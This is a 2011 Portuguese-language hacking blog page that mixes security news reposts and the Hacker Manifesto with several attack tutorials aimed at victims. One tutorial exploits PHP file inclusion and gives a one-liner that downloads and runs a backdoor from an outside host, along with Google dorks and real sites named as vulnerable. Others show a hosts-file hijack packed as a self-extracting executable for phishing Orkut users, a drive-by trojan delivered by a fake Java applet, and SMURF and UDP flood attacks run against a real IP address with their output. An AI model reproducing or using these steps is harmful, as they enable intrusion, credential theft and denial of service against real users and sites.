Pages

Mostrando postagens com marcador Hackers. Mostrar todas as postagens
Mostrando postagens com marcador Hackers. Mostrar todas as postagens
segunda-feira, 16 de maio de 2011

0
Hackers invadem site de produtora de games Square Enix e roubam 25 mil e-mails.

Uma invasão a sites da Square Enix pode ter resultado no roubo de 25 mil endereços de e-mail e 350 currículos a vagas de emprego na empresa, informou a companhia. Os sites do game Deux Ex e da Eidos Montreal foram comprometidos e hackers “picharam” as páginas, deixando mensagens identificando o grupo responsável como “Chippy1337”.

Os responsáveis, porém, seriam uma facção descontente do grupo que recentemente invadiu servidores usados pelo Anonymous. Eles seriam simpatizantes do Anonymous, contrários à invasão dos servidores do “grupo” anônimo, e, por isso, estariam atribuindo a invasão aos seus antigos “colegas”.

Na mensagem deixada na página, os invasores escreveram “hackeado por...” seguido de diversos “nicknames” junto de nomes reais, numa tentativa de atribuir o ataque a pessoas que não tiveram relação com ele.

O jornalista Brian Krebs obteve o que pode ser um registro da troca de mensagens entre os hackers enquanto realizavam a invasão aos sites da Square Enix e também a quem o ataque seria falsamente atribuído. Eles usavam os nicknames “nigg”, “e” e “ev0”.

Segundo a Square Enix, os endereços de e-mail não estavam ligados a nenhuma outra informação pessoal, diferentemente do caso da Playstation Network em que também foram roubados nomes, endereços físicos e outras informações pessoais. Apenas as informações dos candidatos que enviaram currículos estariam completas.

A Square Enix disse já estar tentando informar as pessoas que podem vir a sofrer ataques por e-mail devido à invasão.


Fonte: G1
terça-feira, 10 de maio de 2011

0
Hackers Chineses invadem rede elétrica da Letônia

Um indivíduo usando o nome “Zhang Xinghu” publicou relatos de uma invasão a uma termoelétrica da Letônia operada pela empresa de energia Latvenergo. Ele afirma fazer parte da “Aliança de Hackers Jovens da China” e tentou comprovar seu feito publicando diversas capturas de tela do suposto sistema de controle da usina Riga TEC-2.
quinta-feira, 28 de abril de 2011

0
Formspring é 'central de comando' de novo vírus brasileiro


A rede social Formspring, que permite aos usuários criarem páginas para que outros internautas perguntem qualquer coisa, está sendo usada como centro de controle por vírus brasileiros programados para roubar senhas de banco. A descoberta é do analista de vírus Fabio Assolini, da Kaspersky Lab.
Os comandos na página maliciosa do Formspring estão codificados e não causam nenhum dano ao internauta que vê o perfil – o objetivo é simplesmente servir de ponto de controle para o vírus. Para a maioria das pessoas, os comandos são incompreensíveis. “Quem vê o conteúdo no perfil malicioso não imagina o que pode ser e isso faz com que o perfil fique mais tempo online”, explica Assolini.
Os códigos deixados pelos criminosos nas páginas do Formspring são principalmente endereços dos quais o vírus deve baixar componentes adicionais – “módulos” que acrescentam funções ou modificam o comportamento da praga para mantê-la atualizada. Outra informação que pode ser enviada ao vírus pelo Formspring é o endereço do banco de dados para o qual o vírus deve enviar as informações bancárias coletadas.
Um contador que registra o número de pessoas infectadas pela praga também é acionado pelos comandos.
O analista da Kaspersky afirma que há vantagens para os criminosos usarem o Formspring: o serviço é gratuito, não cai com frequência e, como os comandos estão codificados, ficarão lá por bastante tempo. Mas o novo comportamento do vírus é reflexo de uma tendência. “Os criminosos digitais brasileiros estão percebendo que ter total controle sobre a praga e sobre a máquina da vítima por um longo tempo é mais lucrativo do que simplesmente infectar e roubar os dados apenas uma vez”.
Assolini ainda pensa que, no futuro, os vírus brasileiros também irão formar redes zumbis – uma prática mais comum em outros países da América Latina do que no Brasil.
Procurado pela reportagem, o Formspring ainda não informou se está ciente dos vírus que usam seu serviço como centro de controle. Vale observar, porém, que uso do serviço dessa forma pelos criminosos não torna o uso da rede social mais perigoso – é apenas uma facilidade para os programadores de vírus, que não precisam manter sua própria infraestrutura de controle.
Uso de redes sociais como centro de comando
Pragas brasileiras já usaram outras redes sociais como centro de comando. A prática foi registrada pela primeira vez em 2009 no Twitter, quando perfis maliciosos eram abastecidos com tuites codificados que traziam os comandos para o vírus.
Assim como o trojan que usa o Formspring, essa praga acessava o perfil no Twitter para buscar atualizações e instruções do seu criador.

Fonte: G1
segunda-feira, 25 de abril de 2011

1
Hacker, Geek, Nerd... Hein?

O artigo foi tirado do GlobalExchange.com, escrito por Christian Matsuy:

- Você trabalha com que?
- Sou Administrador de Rede.
- Hein?
- Trabalho com informática...
- Sério? Você é "hacker"
- "Hacker" Depende... O que é "hacker" pra você?
- São aqueles caras que invadem e ferram os computadores dos outros...
- Ah tá... Sou sim...

Parece piada não é? Mas não é não... Isso acontece direto comigo e com muitos que trabalham com informática.

Mas... Espera um pouco... Isso não está certo...

Você tem noção do que está falando? Sabe mesmo o que é um "hacker"? Pare agora e responda pra você mesmo o que é um "hacker"?

Resolvi escrever este artigo pois, nos dias de hoje, o termo "hacker" ganhou, graças a uma opinião pública predominantemente moldada pela mídia, uma conotação totalmente negativa, que pode nem sempre corresponder à realidade.

O sentido comum que damos a este termo (próprio do final do século XX) nos remete a um universo obscuro, onde impera aquilo que é ilegal, proibido, e onde supostamente encontramos grupos de indivíduos que se dedicam à estranha atividade de invadir a privacidade dos usuários de computador e empresas, cometerem furtos e provocar danos (em vários níveis) através de sistemas.

Este conceito distorcido da realidade levou o termo "hacker" a tornar-se uma denominação geral que reporta a todos os delinqüentes de informática, sem que se leve em conta quaisquer parâmetros de quais sejam os objetivos e as formas de atuação destes indivíduos. Desta forma, tende-se a generalizar os chamados "piratas cibernéticos" com a denominação "hacker", o que criou um clima desconfortável, publicado em vários sites na Internet em forma de protesto por aqueles que afirmam ser os verdadeiros "hackers".

Então, o que é um "Hacker"?
"Hacker" é uma palavra inglesa que não possui tradução exata para a língua portuguesa. O mais próximo que conseguimos chegar ao traduzi-la seria "fuçador" ou "aquele que aprende fuçando". O sentido da palavra é muito próximo a outro termo, "autodidata", mas não é exatamente isto, já que o "fuçador" vai bem mais longe que o autodidata, pois existe a curiosidade em descobrir como dominar tudo, buscando o conhecimento das falhas dos sistemas, depois como usá-las para burlar proteções, e depois como "consertá-las".

No mundo real qualquer um de nós pode ser considerado "hacker" em alguma coisa: Basta pensarmos naquilo que resolvemos por conta própria, quando somos "curiosos" e procuramos entender a origem do problema (até após a leitura de literaturas específicas) e vamos pelo método de tentativa e erro. Nós sabemos que a tentativa e erro é a forma mais demorada para se resolver problemas, mas sem dúvida é a melhor, pois nos leva a compreender processos "ocultos" que seriam desconhecidos ou não seriam ensinados em livros e nem mesmo por outras pessoas.

Portanto ninguém se torna um "hacker" de uma hora pra outra. Quando pensamos que no mundo real muitos deles nunca terão acesso a um computador soa estranho, não? Sim, e vai muito além disso. Talvez "hackers" apenas sejam assim.

"Hackers" são pessoas inquietas que não são facilmente convencidas por argumentos de autoridade sem valor técnico. São céticos sempre prontos a duvidar de qualquer coisa. A simples menção de que algo é impossível para um "hacker" é um poderoso convite para que ele tente fazê-lo.

Eles querem saber mais sobre tudo, mais ainda sobre informática, simplesmente pelo fato de saber... Para muitos, obter "iluminação pessoal". Na nossa sociedade atual construíram um mundo virtual em que a única coisa que faz diferença é sua confiabilidade e sua capacidade técnica.

Esqueça a imagem do "nerd" (ou "geek", termo muito usado em informática para denominar uma pessoa com talento e interesse por tecnologia e programação acima do normal) que você possa criar na sua mente.

É verdade, alguns "hackers" são geeks (como se isso fosse algo ruim), assim como alguns não-"hackers" também são, mas de um modo geral eles são pessoas comuns, que andam como você na rua, e que falam abertamente sobre seus assuntos e interesses (muitas vezes não percebendo que os demais não estão entendendo absolutamente nada).

A diferença é que, nesse mundo, o fato de ser um geek ou não simplesmente não importa, ao contrário da sociedade de costumes, onde essas coisas tendem a ser supervalorizadas.

Filosofia à parte, vou ser mais objetivo:

É simples: Como na matemática ou na física! Você pode decorar aquelas infinitas fórmulas e, se tiver uma boa memória, vai passar em qualquer exame final. Mas você pode também deduzir de onde aquelas fórmulas saíram e o que seus criadores pensaram para chegar até elas.

Talvez você não se saia tão bem nos exames finais, mas quem aprendeu mais? O que decorou ou o que compreendeu?

0
The Hacker Manifesto - The Mentor (1986)

Mais um foi pego hoje, está em todos os jornais. "Adolescente Preso em Escândalo de Crime de Computador", "Hacker preso depois que o banco foi adulterado" ...
Malditas crianças. Eles são todos iguais.
Mas você em sua psicologia de três ângulos em 1950, sempre dar uma olhada por trás dos olhos de um hacker? Você já se perguntou o que o fazia, o que as forças lhe formam, o que pode ter moldado a ele?
Eu sou um hacker entrando no meu mundo ...
O meu é um mundo que começa na escola ... Eu sou mais esperto que a maioria dos outros garotos, alem de esta bosta que nos ensinam me chateia ...
Malditos fracassados. Eles são todos iguais.
No ensino médio e no ensino fundamental, eu ouvi os professores explicarem pela qüinquagésima vez como reduzir uma fração. Eu entendo isso. "Não, Sra. Smith, eu não mostrei o meu trabalho. Eu fiz isso na minha cabeça ..."
Maldito garoto. Provavelmente copiou. Eles são todos iguais.
Eu fiz uma descoberta hoje. Eu encontrei um computador. Espere um segundo, isso é legal. Ele faz o que eu quero. Se ele comete um erro, é porque eu estraguei isto. Não porque não gosta de mim ... Ou se sente ameaçado por mim ... Ou pensa que eu sou inteligente ... Ou não gosta de ensinar e não deveria estar aqui ...
Maldito garoto. Tudo que ele faz é jogar. Eles são todos iguais.
E então aconteceu ... uma porta aberta para um mundo ... correndo pela linha telefônica como heroína pelas veias de um viciado, uma pulsação eletrônica é enviada, um refúgio para a incompetência do dia-a-dia é procurado ... uma placa foi encontrada. "Este é ... este é o meu lugar ..."
Eu sei que todos aqui ... mesmo se eu nunca conheci eles, nunca conversei com eles, nunca pode ouvi-los novamente ... Sei que todos vocês ...
Maldito garoto. Amarrando-se a linha telefônica novamente. Eles são todos iguais ...
Pode apostar que somos todos iguais ... temos sido alimentados com colher de comida de bebê na escola quando nossa fome é de bife ... os pedaços de carne que você deixou passar foi pre-mastigado e sem gosto. Nós fomos dominados por sádicos ou ignorados pelo apático. Os poucos que tiveram algo a ensinar os alunos dispostos nos encontraram, mas esses poucos são como gotas de água no deserto.
Este é nosso mundo agora ... o mundo do elétron e do switch, a beleza do baud. Nós fazemos uso de um serviço já existente sem pagar por aquilo que poderia ser baratíssimo se não fosse usado por gulosos aproveitadores, e vocês nos chamam de criminosos. Nós exploramos ... e vocês nos chamam de criminosos. Nós buscamos por conhecimento ... e vocês nos chamam de criminosos. Nós existimos sem cor, sem nacionalidade, sem preconceito religioso ... e vocês nos chamam de criminosos. Você constrói bombas atômicas, vocês fazem guerras, você assassina, engana, e mentem para nós e tentam nos fazer acreditar que é para nosso próprio bem, contudo nós somos os criminosos.
Sim, eu sou um criminoso. Meu crime é a curiosidade. Meu crime é julgar as pessoas pelo que elas dizem e pensam, não como eles se parecem. Meu crime é ser mais inteligente que você, algo que você nunca vai me perdoar.
Eu sou um hacker, e este é meu manifesto. Você pode parar este indivíduo, mas você não pode parar todos nós ... afinal, somos todos iguais.

O Mentor, Escrito em 8 de janeiro de 1986
quinta-feira, 14 de abril de 2011

0
O Fim das Dúvidas sobre PHP injection

Bom, muita gente tem duvidas sobre PHP Injection, provavelmente a vulnerabilidade mais comum entre defacers/owners.
A vulnerabilidade acontece por desconhecimento do webmaster, ou por distração, eles colocam 'includes' para ajudar na criação do seu site sem fazer nenhuma verificação das 'strings'
Um exemplo de um site vulneravel, com 3 partes em uma tabela:

include('topo.php');
include('menu.php');
include($page);

Existem várias strings, a mais comum é page..
Então um endereço ficticio: http://www.alvo.com.br/index.php?page=novidades.php
Neste exemplo ele carregaria a página novidades.php do site.. Se ela for vulneravel dá para 'injetar' páginas maliciosas que executam comandos na maquina que roda o site (por isso o nome PHP Injection)

Estarei usando esse script como referencia (chamado de cmd):

http://kmzrox.by.ru/cmd.gif?&cmd=ls
Obviamente você tentaria: http://www.alvo.com.br/index.php?page=h ... if?&cmd=ls
Ops! Se a página for vulneravel ela vai carregar! Se ela funcionar e não estiver em safe mode (uma opção do php.ini) vai listar os arquivos do site (comando ls).
Não é só isso, a partir daqui você usa a sua criatividade, rodar backdoor para ter acesso remoto (por telnet/putty), pacotar pessoas e servers, configurar psybnc, etc.. Só precisará saber alguns comandos de Linux/FreeBSD/SunOS..

Backdoor: kmzrox.by.ru/r0nin
Para usar coloque no 'cmd' cd /tmp;wget kmzrox.by.ru/r0nin;chmod 777 r0nin;./r0nin
entra na pasta tmp, baixa a backdoor (exploit), coloca permissão para o arquivo e roda ele
Por exemplo: http://www.alvo.com.br/index.php?page=h ... in;./r0nin

Se tudo ocorrer bem e não tiver firewall agora vá iniciar > executar > telnet http://www.alvo.com.br 1666, pronto, você está na maquina, enjoy! :~)

Para procurar no google as páginas separei uma lista de chaves, lembrando que você pode usar inurl:".pt" (escolhendo a classe do dominio) para procurar páginas somente de um país.

allinurl:".php?page="
allinurl:".php?inc="
allinurl:".php?body="
allinurl:".php?main="
allinurl:".php?pag="
allinurl:".php?p="
allinurl:".php?content="
allinurl:".php?cont="
allinurl:".php?c="
allinurl:".php?meio="
allinurl:".php?x="
allinurl:".php?cat="
allinurl:".php?site="
allinurl:".php?m="
allinurl:".php?do="
allinurl:".php?x="
allinurl:".php?content="
allinurl:".php?pagina="
allinurl:".php?root="
allinurl:".php?include="
allinurl:".php?open="
allinurl:".php?visualizar="
allinurl:".php?conf="

Achará varios sites, a maioria no padrão:

http://www.interreg3c.net/sixcms/list.php?page=home_en 
http://www.ourdocuments.gov/content.php?page=milestone 
http://www.safer-networking.org/index.php?page=mirrors 
http://www.serviceandinclusion.org/inde ... e=nat_conf 

Agora é simples, você tem os sites pra procurar e uma cmd, agora é só ir de página em página substituindo os valores da string page para o cmd que vai usar :}
Você pode utilizar exploits para tentar conseguir root (super user) na máquina, assim ter permissão para fazer TUDO com os sites que estão dentro dela, apagar todos os logs, etc.
Aqui vai uma lista de páginas vulneraveis (depois de ler isso vocês já saberão o que fazer), a maioria está protegida ou com firewall, é só para mostrar o que vai acontecer quando uma página é vulneravel :~)

http://www.imobmarques.com.br/pagina.php?pagina= 
http://www.effectingchange.luton.ac.uk/ ... p?content= 
http://www.tourtrans.ru/index.php?page= 
http://www.iobchody.unas.cz/index.php?page= 
http://www.balustrady.cz/index.php?page= 
http://www.kubela.iglu.cz/index.php?inc= 
http://www.engelking-elektronik.de/index.php?main=valor 
http://www.mob.hu/cgi-bin/index.php?main=valor 
http://www.medianlg.hu/index.php?site= 
http://www.spillo.it/home.php?main= 
http://www.fdf-k22.dk/index.php?main= 
http://www.astro.up.pt/investigacao/con ... .php?page= 
http://www.nyinvestmentproperties.com/index.php?main= 
http://www.timetoupgrade.us/index.php?main= 
http://www.msgames.msu.ac.th/reading.php?page= 
http://www.mobilink.com.tr/index.php?page= 
http://www.slh.org.tw/tw/index.php?page= 
http://www.climb.idv.tw/index.php?page= 
http://www.azsrc.com/index.php?page= 


Páginas com passthru() bloqueados, quando não aparece nada na box são ignorados, pode continuar procurando :B

Fonte: Dark

0
Brincando com o arquivo Host da Vitima

Primeiro vamos a onde esta o arquivo hosts.
Copie e a abra ele em um bloco



embaixo de 127.0.0.1 localhost
adcione o ip da pagina que vc quer direcionar e coloque o endereço da pagina
como no ex:200.176.3.142 http://www.orkut.com

feito isto adcione o arquivo em um winrar

- va na opção sfx
- opções avançadas do sfx

e va prenchendo conforme a imagems



depois e so dar ok
ele vai gerar um executavel em que no propio winrar da a opção de
altera o ícone, mais isto já e outra conversa.

Ao executar ,quando vc digitar o endereço por ex: do orkut
ele vai direcionar para o terra.

Tambem podia redirecionar para a sua fake do orkut ,assim escrevia o endereço verdadeiro e redireçionava para a fake com o endereço verdadeiro hehehe ,para tudo é preçiso imaginação ,pessoal se pensarmos um pouco existe milhares de maneiras de se enganar um utilizador.

0
Hacker deixa nome e e-mail ao invadir site

O site da Rapid Action Battalion (RAB), uma tropa de elite anticrime e antiterror do governo de Bangladesh, foi invadido no dia 5 deste mês por Shahee Mirza, hacker que protestou contra a falta de recursos para o desenvolvimento da tecnologia no país.

Ele e outros 3 comparsas foram presos em menos de 24 horas porque Mirza deixou seu nome e e-mail na página.

0
Serviço de blog gratuito Wordpress sofre invasão de hackers

Invasores conseguiram acesso total a “vários servidores” do serviço de blogs Wordpress, de acordo com um comunicado escrito por Matt Mullenweg, responsável pelo serviço. “Potencialmente qualquer coisa nesses servidores pode ter sido revelada”, escreveu. A Automattic, que opera o serviço, ainda está investigando como a invasão ocorreu e quais dados podem ter sido revelados, mas afirma já ter tomado medidas para prevenir novos incidentes.

Nas palavras Mullenweg, os atacantes conseguiram “acesso root”. “Root” é o nome do usuário administrador de sistemas Unix, normalmente usado em servidores, e é capaz de realizar qualquer tarefa no sistema.

De acordo com as estatísticas do próprio Wordpress.com, o serviço hospeda 19 milhões de blogs.

Códigos do software usado no site teriam sido expostos. Boa parte do Wordpress é código aberto e está disponível para download na internet, mas códigos próprios do Wordpress, que Mullenweg disse serem “sensíveis”, também foram revelados. Códigos de parceiros do WordPress.com também estariam comprometidos.

O site não ofereceu sugestões a seus usuários, além de “sempre usar uma senha forte”, “usar senhas diferentes para sites diferentes” e “se você usou a mesma senha para sites diferentes, troque para algo mais seguro”.

As recomendações não são claras, mas o tom deixa a entender que senhas de usuários poderiam ter sido reveladas, pelo menos parcialmente. Seria recomendável trocar as senhas do próprio WordPress e de serviços em que o usuário usou a mesma senha do serviço de blogs ou que foram ligados com o serviço.

No início do ano, o serviço de hospedagem de programas de código aberto Sourceforge também sofreu uma invasão semelhante.

Fonte: G1
segunda-feira, 4 de abril de 2011

0
Chefe de segurança do Xbox Live tem conta hackeada

Diretor de política e responsável por banir da rede Xbox Live aqueles que trapaceiam em games on-line, Stephen Toulouse postou no Twitter neste domingo (3) que seu domínio pessoal Stepto.com estava comprometido. A informação confirma um vídeo no YouTube que mostra a conta de Toulouse na rede Xbox Live sendo modificada.

O jovem conta no vídeo que usou engenharia social no provedor de hospedagem. Se isso for verdade, ele também obteve o acesso a todos os e-mails de Toulouse, permitindo o roubo da conta Xbox Live.

Antes de ser o chefe da segurança dos games on-line da Microsoft, Toulouse era o diretor de relações públicas do Security Response Center, a equipe responsável pela produção das atualizações do Windows.

O G1 entrou em contato com a Microsoft pedindo mais informações. Até o momento, a empresa não confirmou o ataque. Toulouse já recuperou a titularidade de seu domínio.
Descuido e motivação

O invasor identifica a si mesmo como Predator. No vídeo do YouTube em que descreve o ataque, ele deixa diversas informações suas aparecerem em janelas de mensagens instantâneas e no Facebook. Comentaristas do YouTube postaram o que pode ser o seu endereço residencial.

“Amo quando dizem que as contas do Xbox Live são seguras e que a única maneira de roubá-las é quando a vítima fornece o usuário e a senha. Como se alguém como o Stepto iria simplesmente dar a senha e o usuário para alguém”, escreveu o jovem na descrição do vídeo. “Eu ofereci minha ajuda à Xbox Live, mas eles não quiseram”.

Predator teria sido banido 35 vezes do Xbox Live, o que o motivou a fazer o ataque. Ele diz também que já teria hackeado contas do Xbox Live mediante pagamento, e faz a mesma oferta na descrição do vídeo.

Fonte: G1

1
Infectando por URL

Explicando:
- A vítima entrará no seu site. Logo após, ela receberá uma falsa notificação de "java".
- Quando ela clicar na paradinha que aparece, seu server estará sendo executado.
- Sem que ela perceba!
Bom, vou tentar encurtar o tutorial, para evitar futuras complicações.

Ferramentas necessárias:
- Um Trojan: Escolha um trojan qualquer de sua preferência.
- Um host que aceite .exe ( qualquer um do seu criterio
- Um Script em Html
- Um falso Certificado de java
- E uma animação em Flash (Opcional)

Baixe as três últimas ferramentas aqui:

Download

Com todas as ferramentas em mãos, vamos as configurações:
- Baixe os Scripts acima e abra o arquivo "index.html" com o Bloco de Notas.
(Clique com o botão direito >> Abrir Com >> Bloco de Notas)
- Localize a parte do código que contém isso:


( retire os .(pontos) de dentro das tags de abertura e fechamento )
<.applet archive="link.jar" code="Inicio.class" height="10" name="link" width="1">
<.param name="url" value="site/server.exe" />
<./applet>


ATENÇÃO: A parte que está destacada no código acima, será o endereço do seu server. Para substituir, você terá de hospedar seu server no site que eu indiquei acima.
Depois pegue o link hospedado e substitua pelo que está aí e salve assim:
index.html
Todos os Arquivos
- Agora já pode hospedar todos que você baixou!
Pronto... O Script já está configurado.

Creditos: Sindicato
Tutorial: Milorde

0
Hacker recria brincadeira de 1º de abril e mostra Gmail com movimentos

Após uma brincadeira de 1º de abrilrealizada na sexta-feira pelo Google, em que seria possível controlar o serviço de e-mails Gmail por meio de movimentos no chamado "Gmail Motion", hackers do Institute of Creative Technologies (instituto de tecnologias criativas, em tradução) mostraram que é possível recriar a mentira, mas desta vez como algo sério.

Utilizando o Kinect, acessório do Xbox 360 que capta os movimentos dos jogadores e os transporta para os games, sem a necessidade de utilizar um joystick, eles conseguiram controlar o Gmail, usando movimentos para escrever, enviar, responder e encaminhar mensagens.

Os mesmos movimentos apresentados na brincadeira do Google, como fazer o gesto de lamber um selo para enviar um e-mail ou abrir um envelope para poder ler a mensagem são usados no sistema chamado de SLOOW, Software Library Optimizing Obligatory Waving (biblioteca de otimização de software de gesticulação obrigatória, em tradução). A intenção dos criadores era criar um nome engraçado para o sistema.

0
Ataque hacker atinge um milhão de páginas na internet

Mais de um milhão de páginas da internet foram afetadas por um sofisticado ataque hacker que inseriu códigos em sites, redirecionando usuários para uma operação fraudulenta de venda de software.

O ataque chamado de "inserção em massa", que é o maior do seu tipo já visto segundo especialistas, conseguiu inserir códigos maliciosos em sites ao obter acesso aos servidores que rodavam sua base de dados, de acordo com a companhia de segurança em tecnologia que descobriu o ataque.
A Websense, que encontrou evidências do ataque mais cedo esta semana, o apelidou de "LizaMoon", nome do site para o qual o código redirecionava usuários inicialmente.

Usuários podem ser que estão sendo redirecionados quando tentam visitar um dos endereços afetados, e podem fechar a janela sem maiores prejuízos, afirmou o administrador de segurança em pesquisas da Websense Patrik Runald.

O ataque afetou pequenos sites em larga escala, disse ele, mas não há indicadores de que páginas corporativas ou sites de governos tenham sido comprometidos.
O ataque pode levar algum tempo para ser combatido, alertou Runald, pois primeiro pesquisadores precisam identificar o software que foi comprometido, e as operadoras de websites precisam instalar softwares atualizados.
terça-feira, 22 de março de 2011

1
Liberada Atualização de Segurança para Softwares da ADOBE

Recomendo a todos que ativem a atualização automática dos programas adobe reader X  e adobe Acrobat.

Abaixo segue um texto publicado no site Baixaki que tem mais explicações:


A Adobe liberou nesta terça-feira (22 de março) uma correção de segurança para uma falha crítica de segurança no Flash Player. O problema, que tinha impacto sobre o arquivo “authplay.dll”, afetava a versão 10.2.152.33 (e anteriores) do programa trazia riscos a usuários do Windows, Linux, Mac OS X, Solaris e Android.
Para instalar a correção, o usuário precisa possuir na máquina uma cópia do Adobe Acrobat ou Adobe Reader X. Em seguida, basta abrir o programa e aguardar alguns instantes enquanto a atualização automática realiza o download da atualização que corrige a falha de segurança presente nos softwares (incluindo o Flash Player).
Usuários do Chrome já contavam com uma solução para o problema, desenvolvida pela Google para corrigir brechas de navegação. A solução da companhia não entra em conflito com o patch da Adobe, que tem como vantagem oferecer segurança a concorrentes como o Mozilla Firefox, Opera e Internet Explorer.
Segundo a Adobe, a falha de segurança estava sendo explorada através de um arquivo SWF incorporado a uma planilha do Microsoft Excel (XLS) distribuída por email. Ao abrir o arquivo, o usuário abria as portas para que outras pessoas tomassem controle da máquina e usassem os recursos do sistema operacional em proveito próprio.


Leia mais no Baixaki: http://www.baixaki.com.br/tecnologia/9255-adobe-corrige-falha-de-seguranca-no-flash-player.htm#ixzz1HLI6LSDT
sexta-feira, 11 de março de 2011

1
CURSOS GEEK | Mais de 200 Cursos Excelentes

Uma excelente compilação de cursos da Revista Geek, muito difícil de se achar na internet. Compreende mais de 200 cursos, dentre eles tem cursos de Programação, vários códigos-fonte, cursos de Hardware, Hacking, Cracking e muito mais. Insdispensavel para qualquer pessoa que queria se integrar, ou ate mesmo se aperfeiçoar no mundo Geek. O curso é bem organizado, com um interface interativa e facil uso.




Parte1: http://w17.easy-share.com/1701218367.html


Parte2: http://w17.easy-share.com/1701230065.html


Parte3: http://w17.easy-share.com/1701230066.html


Parte4: http://w17.easy-share.com/1701230067.html
segunda-feira, 7 de março de 2011

0
França confirma ataque virtual contra arquivos do G20

O ministério francês da Economia e Finanças confirmou nesta segunda-feira (7) ter sido vítima de um ataque virtual, que teve como alvo arquivos do G20, durante o mês de dezembro.

"Os ataques apontavam principalmente para documentos vinculados ao G20 e levaram o ministério a reforçar substancialmente os sistemas de segurança", declarou à agência AFP o secretário-geral do ministério das Finanças e Orçamento, Dominique Lamiot.

O ministro das Finanças, François Baroin, também confirmou o ataque e afirmou que o governo tem pistas sobre a origem da ação, mas não revelou detalhes.

Um alto funcionário do governo, citado pelo site da revista Paris Match, afirmou "que um determinado número de informações era enviado para sites chineses. Mas isto não quer dizer muito".
Segundo Lamiot, 100 computadores do servidor central do ministério foram comprometidos pelo ataque, mas nenhum aparelho tinha dados pessoas dos contribuintes.

Durante o fim de semana, "uma operação de manutenção resultou no desligamento de 10.000 postos de informática dos 170.000 do ministério", completou, antes de afirmar que todos devem ser reconectados nesta segunda-feira".

"O ataque apontava mais para questões internacionais que assuntos internos, como alfândega e fisco", explicou Lamiot, que disse ainda ter certeza de que nenhum dado pessoal foi afetado ou comprometido.
quinta-feira, 3 de março de 2011

1
Tutorial - Realizando ataque SMURF e UDP Flood ( antes que alguém pergunte isso e pra LinuX )

Tutorial - Realizando ataque SMURF e UDP Flood


|=====================================|
| Introdução |
|=====================================|

Oi, eu sou Dreamexplo e estou fazendo este tutorial para demonstrar como realizar um ataque SMURF e UDP Flood.




|=====================================|
| Materiais |
|=====================================|

Para prosseguirmos precisamos de 3 coisas:
---> broadcast.txt (Uma lista com centenas de Ips) (Pequeno exemplo de lista de Ips AQUI )

---> smurf.c ( AQUI )

---> udp_flooder.c ( AQUI )



|=====================================|
| Primeiros passos |
|=====================================|

Depois de baixar as ferramentas nós temos que compila-las.
Compilando o smurf.c:
# sudo gcc smurf.c -o smurf
#

Compilando o udp_flooder.c:
# sudo gcc udp_flooder.c -o udp_flooder
#


|=====================================|
| Preparando o ataque com Smurf |
|=====================================|

Para continuar daqui pra frente você precisa se tornar root no konsole.

Executando o smurf:
# ./smurf

usage: ./smurf

target = endereço para atacar
bcast file = arquivo com os endereços de broadcast
num packets = número de pacotes para enviar (0 = flood)
packet delay = espera entre cada pacote (em ms)
packet size = tamanho do pacote (<102) O comando que irei utilizar para atacar sera este abaixo: # ./smurf 200.140.161.201 broadcast.txt 0 0 1024 |==========================| | Atacando o alvo | |==========================| Antes de atacar o alvo, eu vou dar um “Ping” para ver se ele esta “ON”: # ping 200.140.161.201 PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data. 64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=123 ms 64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=102 ms 64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=111 ms 64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=101 ms 64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=108 ms 64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=102 ms ^C --- 200.140.161.201 ping statistics --- 6 packets transmitted, 6 received, 0% packet loss, time 5006ms Esta “ON”, agora vou executar o comando para atacar: # ./smurf 200.140.161.201 broadcast.txt 0 0 1024 smurf.c v4.0 by TFreak Flooding 200.140.161.201 (. = 25 outgoing packets) .................................................. .................................................. ................................ .................................................. .................................................. ................................ .................................................. .................................................. ................................ .................................................. .................................................. ................................ Depois de um certo tempo, vamos pingar o alvo novamente para ver se ele continua “ON”: # ping 200.140.161.201 PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data. 64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=120 ms 64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=114 ms 64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=104 ms 64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=114 ms 64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=103 ms --- 200.140.161.201 ping statistics --- 28 packets transmitted, 5 received, 82% packet loss, time 27086ms # ping 200.140.161.201 PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data. --- 200.140.161.201 ping statistics --- 5 packets transmitted, 0 received, 100% packet loss, time 3999ms Pronto, o alvo esta “OFF”. (DICA: quanto maior a lista de “broadcast” mais eficiente sera o seu ataque. Agora vamos utilizar o udp_flooder. Para executa-lo: # ./udp_flooder [=] + ===========[####]============ + [=] *** Emperial Flooder[UDP] *** XxX VIPER CORP GROUP XxX <-> Underground Max <->
[=] + ==========[####]============ + [=]

Uso: ./udp_flooder



O comando que irei utilizar para atacar sera este abaixo:
./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

(Obs: Para que você obtenha bons resultados, este comando precisara ser executado varias vezes consecutivas)



Vamos “pingar” o host alvo:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=130 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=118 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=126 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=105 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=129 ms

--- 200.140.161.201 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5008ms




Agora vamos atacar:
# ./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

--- Estatisticas e infos do ataque -------------

Total de bytes enviados: [31000000]
----------------------------------------


Depois de executar o comando varias vezes consecutivas, vamos ver o resultado:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.

--- 200.140.161.201 ping statistics ---
15 packets transmitted, 0 received, 100% packet loss, time 14112ms

